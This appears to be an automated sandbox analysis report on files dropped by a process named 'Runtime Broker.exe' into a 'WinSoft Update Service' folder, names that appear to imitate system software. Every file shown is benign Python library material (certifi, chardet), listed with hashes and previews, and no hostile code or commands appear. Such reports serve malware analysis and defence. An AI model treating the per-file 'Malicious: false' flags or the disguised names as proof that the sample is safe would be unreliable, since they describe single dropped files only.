Preview:	.# Issuer: CN=GlobalSign Root CA O=GlobalSign nv-sa OU=Root CA.# Subject: CN=GlobalSign Root CA O=GlobalSign nv-sa OU=Root CA.# Label: "GlobalSign Root CA".# Serial: 4835703278459707669005204.# MD5 Fingerprint: 3e:45:52:15:09:51:92:e1:b7:5d:37:9f:b1:87:29:8a.# SHA1 Fingerprint: b1:bc:96:8b:d4:f4:9d:62:2a:a8:9a:81:f2:15:01:52:a4:1d:82:9c.# SHA256 Fingerprint: eb:d4:10:40:e4:bb:3e:c7:42:c9:e3:81:d3:1e:f2:a4:1a:48:b6:68:5c:96:e7:ce:f3:c1:df:6c:d4:33:1c:99.-----BEGIN CERTIFICATE-----.MIIDdTCCAl2gAwIBAgILBAAAAAABFUtaw5QwDQYJKoZIhvcNAQEFBQAwVzELMAkG.A1UEBhMCQkUxGTAXBgNVBAoTEEdsb2JhbFNpZ24gbnYtc2ExEDAOBgNVBAsTB1Jv.b3QgQ0ExGzAZBgNVBAMTEkdsb2JhbFNpZ24gUm9vdCBDQTAeFw05ODA5MDExMjAw.MDBaFw0yODAxMjgxMjAwMDBaMFcxCzAJBgNVBAYTAkJFMRkwFwYDVQQKExBHbG9i.YWxTaWduIG52LXNhMRAwDgYDVQQLEwdSb290IENBMRswGQYDVQQDExJHbG9iYWxT.aWduIFJvb3QgQ0EwggEiMA0GCSqGSIb3DQEBAQUAA4IBDwAwggEKAoIBAQDaDuaZ.jc6j40+Kfvvxi4Mla+pIH/EqsLmVEQS98GPR4mdmzxzdzxtIK+6NiY6arymAZavp.xy0Sy6scTHAHoT0KMM0VjU/43dSMUBUc71DuxC73/OlS8pF94G3VNTCOXkNz

C:\Program Files (x86)\WinSoft Update Service\Lib\site-packages\certifi\core.py Download File
Process:	C:\Users\user\Desktop\Runtime Broker.exe
File Type:	Python script, ASCII text executable
Category:	dropped
Size (bytes):	2303
Entropy (8bit):	4.511121053674014
Encrypted:	false
SSDEEP:	48:bpq/kD5+zZ0bY7eu7DDMQT/9dKa8q8wJZBprf0vk:g/kdjbY7xDtDKfVwrBprfCk
MD5:	E9695A9F9664E50346014590A276EDED
SHA1:	427C0CFA4131820D8F999AE3999C0DEAECAD5E5A
SHA-256:	574BB2C4A398773EAE9434AEB1C96B2E68DB3E0397B03D019C47F4490ECE9E81
SHA-512:	D5B793F637DD7CA4049FE82962917B9F2E9DD87B7B26F4710E18C66E00E7D3040C5A136D920D141562D335B1F2B277B48A8F67AEA8ECCFAE8F10329422DB4DF4
Malicious:	false
Preview:	# -- coding: utf-8 --..""".certifi.py.~~~~~~~~~~..This module returns the installation location of cacert.pem or its contents..""".import os..try:. from importlib.resources import path as get_path, read_text.. _CACERT_CTX = None. _CACERT_PATH = None.. def where():. # This is slightly terrible, but we want to delay extracting the file. # in cases where we're inside of a zipimport situation until someone. # actually calls where(), but we don't want to re-extract the file. # on every call of where(), so we'll do it once then store it in a. # global variable.. global _CACERT_CTX. global _CACERT_PATH. if _CACERT_PATH is None:. # This is slightly janky, the importlib.resources API wants you to. # manage the cleanup of this file, so it doesn't actually return a. # path, it returns a context manager that will give you the path. # when you enter it and will do any cleanup when you l

C:\Program Files (x86)\WinSoft Update Service\Lib\site-packages\chardet-4.0.0.dist-info\INSTALLER Download File
Process:	C:\Users\user\Desktop\Runtime Broker.exe
File Type:	ASCII text
Category:	dropped
Size (bytes):	4
Entropy (8bit):	1.5
Encrypted:	false
SSDEEP:	3:Mn:M
MD5:	365C9BFEB7D89244F2CE01C1DE44CB85
SHA1:	D7A03141D5D6B1E88B6B59EF08B6681DF212C599
SHA-256:	CEEBAE7B8927A3227E5303CF5E0F1F7B34BB542AD7250AC03FBCDE36EC2F1508
SHA-512:	D220D322A4053D84130567D626A9F7BB2FB8F0B854DA1621F001826DC61B0ED6D3F91793627E6F0AC2AC27AEA2B986B6A7A63427F05FE004D8A2ADFBDADC13C1
Malicious:	false
Preview:	pip.

C:\Program Files (x86)\WinSoft Update Service\Lib\site-packages\chardet-4.0.0.dist-info\LICENSE Download File
Process:	C:\Users\user\Desktop\Runtime Broker.exe
File Type:	ASCII text
Category:	dropped
Size (bytes):	26432
Entropy (8bit):	4.61315802555607
Encrypted:	false
SSDEEP:	384:X/56OuAbnn0UX+X6wFDVxnFw7xqsvzt+z/k8E9HinIhFkspcM9bc7upt0MZuQ2:X/5trR+DnFMz1ReScmc7GtXZuQ2
MD5:	A6F89E2100D9B6CDFFCEA4F398E37343
SHA1:	545F380FB332EB41236596500913FF8D582E3EAD
SHA-256:	6095E9FFA777DD22839F7801AA845B31C9ED07F3D6BF8A26DC5D2DEC8CCC0EF3
SHA-512:	DC4177806315B4CE888798EB5E643BF16B162418ECD10B5E7E9B4E0DF3E17D11E77E402F8BF0A1CC127D870F212A4A67F588F6750F49340997234360E69CAF08
Malicious:	false
Preview:	.. GNU LESSER GENERAL PUBLIC LICENSE... Version 2.1, February 1999.. Copyright (C) 1991, 1999 Free Software Foundation, Inc.. 51 Franklin St, Fifth Floor, Boston, MA 02110-1301 USA. Everyone is permitted to copy and distribute verbatim copies. of this license document, but changing it is not allowed...[This is the first released version of the Lesser GPL. It also counts. as the successor of the GNU Library Public License, version 2, hence. the version number 2.1.]..... Preamble.. The licenses for most software are designed to take away your.freedom to share and change it. By contrast, the GNU General Public.Licenses are intended to guarantee your freedom to share and change.free software--to make sure the software is free for all its users... This license, the Lesser General Public License, applies to some.specially designated software packages--typically libraries--of the.Free Software Foundation and other authors who decide to use it. You.can use it too, but we s

C:\Program Files (x86)\WinSoft Update Service\Lib\site-packages\chardet-4.0.0.dist-info\METADATA Download File
Process:	C:\Users\user\Desktop\Runtime Broker.exe
File Type:	ASCII text
Category:	dropped
Size (bytes):	3526
Entropy (8bit):	5.168152585552706
Encrypted:	false
SSDEEP:	96:DmikLegiQILjaaxmPktxsxy13uGWtM1wJDf1Q7IOpGNM:+Le8wsa+Gf1sZ5OpG+
MD5:	2A7F45FB349FFB79B73F78C1B4B3D2B0
SHA1:	ACFA39A144417C56A3D84D0137A68EF410695853
SHA-256:	C92610004ECD3E6DCBC3180CA858B5CDD2D0E3C9A6C0C6EB270A80582B5C6C7F
SHA-512:	23B5CE9F55102BBBF619798426258F40333EC212CEFEDA6AA0408EC97D7FEBAD57C2008E8936B36FB13BF12316B157E63062F237EA309A282BFD81BC7CF090E9
Malicious:	false
Preview:	Metadata-Version: 2.1.Name: chardet.Version: 4.0.0.Summary: Universal encoding detector for Python 2 and 3.Home-page: https://github.com/chardet/chardet.Author: Mark Pilgrim.Author-email: mark@diveintomark.org.Maintainer: Daniel Blanchard.Maintainer-email: dan.blanchard@gmail.com.License: LGPL.Keywords: encoding,i18n,xml.Platform: UNKNOWN.Classifier: Development Status :: 5 - Production/Stable.Classifier: Intended Audience :: Developers.Classifier: License :: OSI Approved :: GNU Library or Lesser General Public License (LGPL).Classifier: Operating System :: OS Independent.Classifier: Programming Language :: Python.Classifier: Programming Language :: Python :: 2.Classifier: Programming Language :: Python :: 2.7.Classifier: Programming Language :: Python :: 3.Classifier: Programming Language :: Python :: 3.5.Classifier: Programming Language :: Python :: 3.6.Classifier: Programming Language :: Python :: 3.7.Classifier: Programming Language :: Python :: 3.8.Classifier: Programming Language

C:\Program Files (x86)\WinSoft Update Service\Lib\site-packages\chardet-4.0.0.dist-info\RECORD Download File
Process:	C:\Users\user\Desktop\Runtime Broker.exe
File Type:	ASCII text, with CRLF line terminators
Category:	dropped
Size (bytes):	6358
Entropy (8bit):	5.694421096005465
Encrypted:	false
SSDEEP:	96:smX1j7px1UtIJv3lvv4TQXO3Wra/kIRaJhtztCLIRMyGBnERebSf4Z3SsIGSOM2n:smX1xx1oIJvfO7/EEhI1mWe
MD5:	28B27A77716B4D4E19353C2C14BF5450
SHA1:	7F2E17508764518293EADC3ED7433EEF3B9A9259
SHA-256:	28E47890D1E401F8EEB3963C3237F17ED456B459D0BD41779E506E982A91A3B8
SHA-512:	61F866B5928367E80B2E26B30ABE3378661AE0F1B8D0FBFCBE37D1306707E8D2AD6C880DF7EC54071433F6F29CE6F3156D61B9DD1273E69CF3103827E3387759
Malicious:	false
Preview:	../../Scripts/chardetect.exe,sha256=W1XDYf9qy58MURcVw7DHkT4x0ok1tapbyWrfhjZEOlA,97172..chardet-4.0.0.dist-info/INSTALLER,sha256=zuuue4knoyJ-UwPPXg8fezS7VCrXJQrAP7zeNuwvFQg,4..chardet-4.0.0.dist-info/LICENSE,sha256=YJXp_6d33SKDn3gBqoRbMcntB_PWv4om3F0t7IzMDvM,26432..chardet-4.0.0.dist-info/METADATA,sha256=ySYQAE7NPm3LwxgMqFi1zdLQ48mmwMbrJwqAWCtcbH8,3526..chardet-4.0.0.dist-info/RECORD,,..chardet-4.0.0.dist-info/WHEEL,sha256=ADKeyaGyKF5DwBNE0sRE5pvW-bSkFMJfBuhzZ3rceP4,110..chardet-4.0.0.dist-info/entry_points.txt,sha256=fAMmhu5eJ-zAJ-smfqQwRClQ3-nozOCmvJ6-E8lgGJo,60..chardet-4.0.0.dist-info/top_level.txt,sha256=AowzBbZy4x8EirABDdJSLJZMkJ_53iIag8xfKR6D7kI,8..chardet/__init__.py,sha256=mWZaWmvZkhwfBEAT9O1Y6nRTfKzhT7FHhQTTAujbqUA,3271..chardet/__pycache__/__init__.cpython-37.pyc,,..chardet/__pycache__/big5freq.cpython-37.pyc,,..chardet/__pycache__/big5prober.cpython-37.pyc,,..chardet/__pycache__/chardistribution.cpython-37.pyc,,..chardet/__pycache__/charsetgroupprober.cpython-37.pyc,,..chard

C:\Program Files (x86)\WinSoft Update Service\Lib\site-packages\chardet-4.0.0.dist-info\WHEEL Download File
Process:	C:\Users\user\Desktop\Runtime Broker.exe
File Type:	ASCII text
Category:	dropped
Size (bytes):	110
Entropy (8bit):	4.816968543485036
Encrypted:	false
SSDEEP:	3:RtEeX7MWcSlVii6KRRP+tPCCf7irO5S:RtBMwlViGjWBBwt
MD5:	D25A99ECD1ECB535EE4E31874B0C7B95
SHA1:	B80780FBBF97A5FBF433C4F692E340632EA675F1
SHA-256:	00329EC9A1B2285E43C01344D2C444E69BD6F9B4A414C25F06E873677ADC78FE
SHA-512:	539E072414E6E8AD3BFAEDB0587507443B39826814FB330B57D605FB5FBE61134D3548359F41A14CC63B44E23EF0AA1E62EA1C4A2F3B344BE548F4C2C8143976
Malicious:	false
Preview:	Wheel-Version: 1.0.Generator: bdist_wheel (0.35.1).Root-Is-Purelib: true.Tag: py2-none-any.Tag: py3-none-any..

C:\Program Files (x86)\WinSoft Update Service\Lib\site-packages\chardet-4.0.0.dist-info\entry_points.txt Download File
Process:	C:\Users\user\Desktop\Runtime Broker.exe
File Type:	ASCII text
Category:	dropped
Size (bytes):	60
Entropy (8bit):	4.160324136950664
Encrypted:	false
SSDEEP:	3:1GvAr8vLGCeZAO0vn:1u7L6Zv0v
MD5:	B65F7BFDE70CE91F668944119FDF1923
SHA1:	529FC858FDFDA889EAA5EAFC9CB699C4305B19D6
SHA-256:	7C032686EE5E27ECC027EB267EA430442950DFE9E8CCE0A6BC9EBE13C960189A
SHA-512:	CB56AE858AA2E45A4AB8ED228D3C2BEE810428BA9492EC3EB024CC7F6B8A874A8D59FECF93528D2B327D4066B47B2B87B66B9CDBC8AD231D9E7D490F8F92803D
Malicious:	false
Preview:	[console_scripts].chardetect = chardet.cli.chardetect:main..

C:\Program Files (x86)\WinSoft Update Service\Lib\site-packages\chardet-4.0.0.dist-info\top_level.txt Download File
Process:	C:\Users\user\Desktop\Runtime Broker.exe
File Type:	ASCII text
Category:	dropped
Size (bytes):	8
Entropy (8bit):	3.0
Encrypted:	false
SSDEEP:	3:Z0vn:uvn
MD5:	DFA288092949BE4DED87CFE9BE2702A5
SHA1:	AD425BF5119CE57A37E3FA126DB0D4DCACB05013
SHA-256:	028C3305B672E31F048AB0010DD2522C964C909FF9DE221A83CC5F291E83EE42
SHA-512:	55C6E553FA35EC923208B4DE293B332A5B2B4B7B014423EE133BB21E43A39B8755AE24B80AAE5255B6BE8864680B9EDEB234D8E0D7CBE5DC4A90639FCF620CB0
Malicious:	false
Preview:	chardet.

C:\Program Files (x86)\WinSoft Update Service\Lib\site-packages\chardet\__init__.py Download File
Process:	C:\Users\user\Desktop\Runtime Broker.exe
File Type:	Python script, ASCII text executable
Category:	dropped
Size (bytes):	3271
Entropy (8bit):	4.647327189615612
Encrypted:	false
SSDEEP:	48:g0uwyUjHSnvi/dSMLACrCBnPRy6sJBMLACrCBnPRC6ayTL2Dg7fkQeUp8Mxyd:9u4GGdSMbJBM9o/eUp8/d
MD5:	2FC59815B38752DB9228D08EA57393D2
SHA1:	528941E0635B972612867CEDB7C1DE455E307416
SHA-256:	99665A5A6BD9921C1F044013F4ED58EA74537CACE14FB1478504D302E8DBA940
SHA-512:	03807B23F91CEEBC533B81C80745114EEB97098BC7658B6DFAF547BBB146B77AC395482F63E8DE5E3ED680C095A7011E77241C800E42CBDDE6AC41D44D9A69E3
Malicious:	false
Preview:	######################## BEGIN LICENSE BLOCK ########################.# This library is free software; you can redistribute it and/or.# modify it under the terms of the GNU Lesser General Public.# License as published by the Free Software Foundation; either.# version 2.1 of the License, or (at your option) any later version..#.# This library is distributed in the hope that it will be useful,.# but WITHOUT ANY WARRANTY; without even the implied warranty of.# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the GNU.# Lesser General Public License for more details..#.# You should have received a copy of the GNU Lesser General Public.# License along with this library; if not, write to the Free Software.# Foundation, Inc., 51 Franklin St, Fifth Floor, Boston, MA.# 02110-1301 USA.######################### END LICENSE BLOCK #########################...from .universaldetector import UniversalDetector.from .enums import InputState.from .version import __version__, VERSION...__all__ =

C:\Program Files (x86)\WinSoft Update Service\Lib\site-packages\chardet\big5freq.py Download File
Process:	C:\Users\user\Desktop\Runtime Broker.exe
File Type:	ASCII text
Category:	dropped
Size (bytes):	31254
Entropy (8bit):	3.8805955906579896
Encrypted:	false
SSDEEP:	768:8u4PjuVhktU0mk0X5oUdVmPLg6BSjvzwjgebYX7VqM1H+n5:8AzktUc0X59dVE+jvw8cM14
MD5:	14C69F7CCF62A473CAF8D24A85302168
SHA1:	4028BD63B9EB6C3225FC61B7E8733528EE80FD87
SHA-256:	0FFCCAE46CB3A15B117ACD0790B2738A5B45417D1B2822CEAC57BDFF10EF3BFF
SHA-512:	7584191B735F623535D25AFD962A80069C6083AD408E8DB6381E238B993209F530D1792B866643DEE2CCDE9191B3B44EDBDA347940E6432A4B29FD0E38C9034F
Malicious:	false
Preview:	######################## BEGIN LICENSE BLOCK ########################.# The Original Code is Mozilla Communicator client code..#.# The Initial Developer of the Original Code is.# Netscape Communications Corporation..# Portions created by the Initial Developer are Copyright (C) 1998.# the Initial Developer. All Rights Reserved..#.# Contributor(s):.# Mark Pilgrim - port to Python.#.# This library is free software; you can redistribute it and/or.# modify it under the terms of the GNU Lesser General Public.# License as published by the Free Software Foundation; either.# version 2.1 of the License, or (at your option) any later version..#.# This library is distributed in the hope that it will be useful,.# but WITHOUT ANY WARRANTY; without even the implied warranty of.# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the GNU.# Lesser General Public License for more details..#.# You should have received a copy of the GNU Lesser General Public.# License along with this library; if

C:\Program Files (x86)\WinSoft Update Service\Lib\site-packages\chardet\big5prober.py Download File
Process:	C:\Users\user\Desktop\Runtime Broker.exe
File Type:	Python script, ASCII text executable
Category:	dropped
Size (bytes):	1757
Entropy (8bit):	4.96764341536432
Encrypted:	false
SSDEEP:	24:vZixsiaiq5E807yRiyUVOkH/HqTbVB+HWRTB2i2A2Rs7ay/D:vsx/1ef0uwyUjHSvT2i2tD2D
MD5:	1A45BD1F7CE22E30EEC32D870AB02E44
SHA1:	5297DF2758B6BE575459E08565B07382EB6D52ED
SHA-256:	901C476DD7AD0693DEEF1AE56FE7BDF748A8B7AE20FDE1922DDDF6941EFF8773
SHA-512:	202F2F681B84A872FE767DC7B42E2B3162E4019BFA97F5C5471CAEB5C222BE7282F692E2A56532D90A94A3355F96275362B291AEBEBA102B8377FE9886021AEA
Malicious:	false
Preview:	######################## BEGIN LICENSE BLOCK ########################.# The Original Code is Mozilla Communicator client code..#.# The Initial Developer of the Original Code is.# Netscape Communications Corporation..# Portions created by the Initial Developer are Copyright (C) 1998.# the Initial Developer. All Rights Reserved..#.# Contributor(s):.# Mark Pilgrim - port to Python.#.# This library is free software; you can redistribute it and/or.# modify it under the terms of the GNU Lesser General Public.# License as published by the Free Software Foundation; either.# version 2.1 of the License, or (at your option) any later version..#.# This library is distributed in the hope that it will be useful,.# but WITHOUT ANY WARRANTY; without even the implied warranty of.# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the GNU.# Lesser General Public License for more details..#.# You should have received a copy of the GNU Lesser General Public.# License along with this library; if

C:\Program Files (x86)\WinSoft Update Service\Lib\site-packages\chardet\chardistribution.py Download File
Process:	C:\Users\user\Desktop\Runtime Broker.exe
File Type:	Python script, ASCII text executable
Category:	dropped
Size (bytes):	9411
Entropy (8bit):	4.862229966867439
Encrypted:	false
SSDEEP:	192:kt17u43bbWNinqFlBv9Ekv9fRFUv9rYfj9ivt9uczv9Yh:8u4HWNEqlBFEkFfRFUFMfRivj5zFYh
MD5:	1348267FC095CAE77B3F24A48DD6ED06
SHA1:	DB44178E9A4908F7256C85A75A7374FB57BF868F
SHA-256:	DF0A164BAD8AAC6A282B2AB3E334129E315B2696BA57B834D9D68089B4F0725F
SHA-512:	F11D2C26226D95142251F3C5C3AA2B2D7C3F40E7C7C191ABCAF14325E76F5C3EA47A1532AF970A214C45864908D936337524EB41C90880464868A54F230C5A65
Malicious:	false
Preview:	######################## BEGIN LICENSE BLOCK ########################.# The Original Code is Mozilla Communicator client code..#.# The Initial Developer of the Original Code is.# Netscape Communications Corporation..# Portions created by the Initial Developer are Copyright (C) 1998.# the Initial Developer. All Rights Reserved..#.# Contributor(s):.# Mark Pilgrim - port to Python.#.# This library is free software; you can redistribute it and/or.# modify it under the terms of the GNU Lesser General Public.# License as published by the Free Software Foundation; either.# version 2.1 of the License, or (at your option) any later version..#.# This library is distributed in the hope that it will be useful,.# but WITHOUT ANY WARRANTY; without even the implied warranty of.# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the GNU.# Lesser General Public License for more details..#.# You should have received a copy of the GNU Lesser General Public.# License along with this library; if

C:\Program Files (x86)\WinSoft Update Service\Lib\site-packages\chardet\charsetgroupprober.py Download File
Process:	C:\Users\user\Desktop\Runtime Broker.exe
File Type:	Python script, ASCII text executable
Category:	dropped
Size (bytes):	3839
Entropy (8bit):	4.452953563997799
Encrypted:	false
SSDEEP:	96:vst17u40JbBxS8EBpSL7eQXa3hgX+IFWXqjuAuYKKv:kt17u48LHNfeFwZ
MD5:	E7F08780A8FB42F77C61315AD721763F
SHA1:	10E9716409D7710FA9C3950B485C8A14576A7EE0
SHA-256:	1992D17873FA151467E3786F48EA060B161A984ACACF2A7A460390C55782DE48
SHA-512:	DC53994C455B281114DCD1307C11CC69FD41912FBBB033B5A59DD331A7F9633738B8871E489C3CECC56230D6781E6038FA6BE5E131D38B7C54B794CA6063832D
Malicious:	false
Preview:	######################## BEGIN LICENSE BLOCK ########################.# The Original Code is Mozilla Communicator client code..#.# The Initial Developer of the Original Code is.# Netscape Communications Corporation..# Portions created by the Initial Developer are Copyright (C) 1998.# the Initial Developer. All Rights Reserved..#.# Contributor(s):.# Mark Pilgrim - port to Python.#.# This library is free software; you can redistribute it and/or.# modify it under the terms of the GNU Lesser General Public.# License as published by the Free Software Foundation; either.# version 2.1 of the License, or (at your option) any later version..#.# This library is distributed in the hope that it will be useful,.# but WITHOUT ANY WARRANTY; without even the implied warranty of.# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the GNU.# Lesser General Public License for more details..#.# You should have received a copy of the GNU Lesser General Public.# License along with this library; if

C:\Program Files (x86)\WinSoft Update Service\Lib\site-packages\chardet\charsetprober.py Download File
Process:	C:\Users\user\Desktop\Runtime Broker.exe
File Type:	Python script, ASCII text executable
Category:	dropped
Size (bytes):	5110
Entropy (8bit):	4.607059113006975
Encrypted:	false
SSDEEP:	96:Ptzcu40B0KIYY6PG/Gyf0LGszdQjq/qbRAdkvSQ0B8E:Ptzcu4lKHuizdQdG
MD5:	A257430E4394E805107C519BA417C3D4
SHA1:	4CAC3F02D5FDAA8776B49966206247ACD3BD151E
SHA-256:	2929B0244AE3CA9CA3D1B459982E45E5E33B73C61080B6088D95E29ED64DB2D8
SHA-512:	EEE24BB77D3F2981C15BA577FBDD2A092A3A786B8CE99B56D204214C737B8EBA2CD380E8FBC10CC9BD758C949A79626912B57482EE099EA0E43448DCE295BE37
Malicious:	false
Preview:	######################## BEGIN LICENSE BLOCK ########################.# The Original Code is Mozilla Universal charset detector code..#.# The Initial Developer of the Original Code is.# Netscape Communications Corporation..# Portions created by the Initial Developer are Copyright (C) 2001.# the Initial Developer. All Rights Reserved..#.# Contributor(s):.# Mark Pilgrim - port to Python.# Shy Shalom - original C code.#.# This library is free software; you can redistribute it and/or.# modify it under the terms of the GNU Lesser General Public.# License as published by the Free Software Foundation; either.# version 2.1 of the License, or (at your option) any later version..#.# This library is distributed in the hope that it will be useful,.# but WITHOUT ANY WARRANTY; without even the implied warranty of.# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the GNU.# Lesser General Public License for more details..#.# You should have received a copy of the GNU Lesser General Publi

C:\Program Files (x86)\WinSoft Update Service\Lib\site-packages\chardet\cli\__init__.py Download File
Process:	C:\Users\user\Desktop\Runtime Broker.exe
File Type:	very short file (no magic)
Category:	dropped
Size (bytes):	1
Entropy (8bit):	0.0
Encrypted:	false
SSDEEP:	3:v:v
MD5:	68B329DA9893E34099C7D8AD5CB9C940
SHA1:	ADC83B19E793491B1C6EA0FD8B46CD9F32E592FC
SHA-256:	01BA4719C80B6FE911B091A7C05124B64EEECE964E09C058EF8F9805DACA546B
SHA-512:	BE688838CA8686E5C90689BF2AB585CEF1137C999B48C70B92F67A5C34DC15697B5D11C982ED6D71BE1E1E7F7B4E0733884AA97C3F7A339A8ED03577CF74BE09
Malicious:	false
Preview:	.

C:\Program Files (x86)\WinSoft Update Service\Lib\site-packages\chardet\cli\chardetect.py Download File
Process:	C:\Users\user\Desktop\Runtime Broker.exe
File Type:	Python script, ASCII text executable
Category:	dropped
Size (bytes):	2711
Entropy (8bit):	4.411874613721609
Encrypted:	false
SSDEEP:	48:Ono2sJX3o8g2zwYV+714Vl/7H1vbbxEJPzFN2+jRYNvexZgOa1:uo9o8jwLCTFPyPxNBja+qOM
MD5:	B881B0F0856FDC622FD7435E6F35ACE1
SHA1:	CF118AF9F5BD309964839FE3DD147790C65A4BA6
SHA-256:	9143DE4028BEA2539B5E93AAE4CB652AE067D44535F6B91E7A700CC3197B5116
SHA-512:	6952F825F8A6DF3847711B4C2BA3EFB4E309F4AB6FB7D2EDCB5F5FBC59568259D6961DC7D66A4DE487F311C53FED430A1C1009305B3EC08AB8A9F3451103EF06
Malicious:	false
Preview:	""".Script which takes one or more file paths and reports on their detected.encodings..Example::.. % chardetect somefile someotherfile. somefile: windows-1252 with confidence 0.5. someotherfile: ascii with confidence 1.0..If no paths are provided, it takes its input from stdin..."""..from __future__ import absolute_import, print_function, unicode_literals..import argparse.import sys..from chardet import __version__.from chardet.compat import PY2.from chardet.universaldetector import UniversalDetector...def description_of(lines, name='stdin'):. """. Return a string describing the probable encoding of a file or. list of strings... :param lines: The lines to get the encoding of.. :type lines: Iterable of bytes. :param name: Name of file or collection of lines. :type name: str. """. u = UniversalDetector(). for line in lines:. line = bytearray(line). u.feed(line). # shortcut out of the loop to save reading further - particularly u

C:\Program Files (x86)\WinSoft Update Service\Lib\site-packages\chardet\codingstatemachine.py Download File
Process:	C:\Users\user\Desktop\Runtime Broker.exe
File Type:	Python script, ASCII text executable
Category:	dropped
Size (bytes):	3590
Entropy (8bit):	4.62398833547819
Encrypted:	false
SSDEEP:	96:Kt17u4ZvK9RfAbiAgdoWnS38L8oxInSOrM+l84bMSmg0:Kt17u4dK9Re2y+wodj+0
MD5:	33C5E712BAD7523F996BFA09D85EB5BF
SHA1:	3E2B59C552B7E985F2EFEE068ABA34A0C7938409
SHA-256:	558A7FE9CCB2922E6C1E05C34999D75B8AB5A1E94773772EF40C904D7EEEBA0F
SHA-512:	CC5CAD5F2E7BAE182FAA81CEEB8FB780883B528E4858A9708A07DFB1C2D7C09819C2699013FAD7FFC5AF09903DA3C86EE1C31CEBC61E555C45C1E0D517ACF399
Malicious:	false
Preview:	######################## BEGIN LICENSE BLOCK ########################.# The Original Code is mozilla.org code..#.# The Initial Developer of the Original Code is.# Netscape Communications Corporation..# Portions created by the Initial Developer are Copyright (C) 1998.# the Initial Developer. All Rights Reserved..#.# Contributor(s):.# Mark Pilgrim - port to Python.#.# This library is free software; you can redistribute it and/or.# modify it under the terms of the GNU Lesser General Public.# License as published by the Free Software Foundation; either.# version 2.1 of the License, or (at your option) any later version..#.# This library is distributed in the hope that it will be useful,.# but WITHOUT ANY WARRANTY; without even the implied warranty of.# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the GNU.# Lesser General Public License for more details..#.# You should have received a copy of the GNU Lesser General Public.# License along with this library; if not, write to th

C:\Program Files (x86)\WinSoft Update Service\Lib\site-packages\chardet\compat.py Download File
Process:	C:\Users\user\Desktop\Runtime Broker.exe
File Type:	ASCII text
Category:	dropped
Size (bytes):	1200
Entropy (8bit):	4.868809040509225
Encrypted:	false
SSDEEP:	24:GXN807yRiyUVOkH/HqTbVB+HzC0GAaM0RmWeqQo:D0uwyUjHSqCjAaMom/qz
MD5:	EBCC3FE46560E1E5C7CA6E347780A828
SHA1:	F229B8B6C252A0ECA565CC8601ABF090AE0EF818
SHA-256:	E34CEBEB0202670927C72B8B18670838FCAF7BC0D379B0426DBBEDB6F9E6A794
SHA-512:	6F1DAA1D2B4C00D001F9EB320479D7C2E84DCBFE8DEDFCACF84A4A3FF82105C17DED710B3E446159D62219E088F098A344032AE2AEC7A90EC811FB09507D4285
Malicious:	false
Preview:	######################## BEGIN LICENSE BLOCK ########################.# Contributor(s):.# Dan Blanchard.# Ian Cordasco.#.# This library is free software; you can redistribute it and/or.# modify it under the terms of the GNU Lesser General Public.# License as published by the Free Software Foundation; either.# version 2.1 of the License, or (at your option) any later version..#.# This library is distributed in the hope that it will be useful,.# but WITHOUT ANY WARRANTY; without even the implied warranty of.# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the GNU.# Lesser General Public License for more details..#.# You should have received a copy of the GNU Lesser General Public.# License along with this library; if not, write to the Free Software.# Foundation, Inc., 51 Franklin St, Fifth Floor, Boston, MA.# 02110-1301 USA.######################### END LICENSE BLOCK #########################..import sys...if sys.version_info < (3, 0):. PY2 = True. PY3 = False. s

C:\Program Files (x86)\WinSoft Update Service\Lib\site-packages\chardet\cp949prober.py Download File
Process:	C:\Users\user\Desktop\Runtime Broker.exe
File Type:	Python script, ASCII text executable
Category:	dropped
Size (bytes):	1855
Entropy (8bit):	4.9674061820096185
Encrypted:	false
SSDEEP:	24:Pixsiaiq5E807yRiyUVOkH/HqTbVB+HDsZRuHwAysvOawK:Kx/1ef0uwyUjHSEWIHwRowK
MD5:	EAC9F36E937956F46F3E4C37F9CD7D76
SHA1:	5E1E40B592AB5BADAEBEE6D1CB845F34475BBEED
SHA-256:	4D9E37E105FCCF306C9D4BCBFFCC26E004154D9D9992A10440BFE5370F5FF68C
SHA-512:	429A0E8A95E7B0A00DC5CF08F6A19D9CAAA94B9D27443110EEFCCF5E7E6891983409D447187209D630FB21AD52D719AE0DD2F95F0274D7D0207C9F608D2EE08B
Malicious:	false
Preview:	######################## BEGIN LICENSE BLOCK ########################.# The Original Code is mozilla.org code..#.# The Initial Developer of the Original Code is.# Netscape Communications Corporation..# Portions created by the Initial Developer are Copyright (C) 1998.# the Initial Developer. All Rights Reserved..#.# Contributor(s):.# Mark Pilgrim - port to Python.#.# This library is free software; you can redistribute it and/or.# modify it under the terms of the GNU Lesser General Public.# License as published by the Free Software Foundation; either.# version 2.1 of the License, or (at your option) any later version..#.# This library is distributed in the hope that it will be useful,.# but WITHOUT ANY WARRANTY; without even the implied warranty of.# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the GNU.# Lesser General Public License for more details..#.# You should have received a copy of the GNU Lesser General Public.# License along with this library; if not, write to th

C:\Program Files (x86)\WinSoft Update Service\Lib\site-packages\chardet\enums.py Download File
Process:	C:\Users\user\Desktop\Runtime Broker.exe
File Type:	Python script, ASCII text executable
Category:	dropped
Size (bytes):	1661
Entropy (8bit):	4.918641425002419
Encrypted:	false
SSDEEP:	24:uKNXveYMIUPhNkBFbFWd/YMSj6YML1ShnccagRxdI5rLGkC6P:F9ve9j1d/sWChnpayXkZ
MD5:	754EAD831ACB9BA0C2E768243ADA5DA2
SHA1:	2EAF9CADC33CD208A4A0378158A07FEA397F6A91
SHA-256:	0229B075BF5AB357492996853541F63A158854155DE9990927F58AE6C358F1C5
SHA-512:	529BE8C6A49A533549DB8B41D1118F5D77780F167259095F92D8F11C5AF09039C7BB110BB56A0C6F5151174418293BA8C2D7AC2BB666B7F723160E9F066D5AA1
Malicious:	false
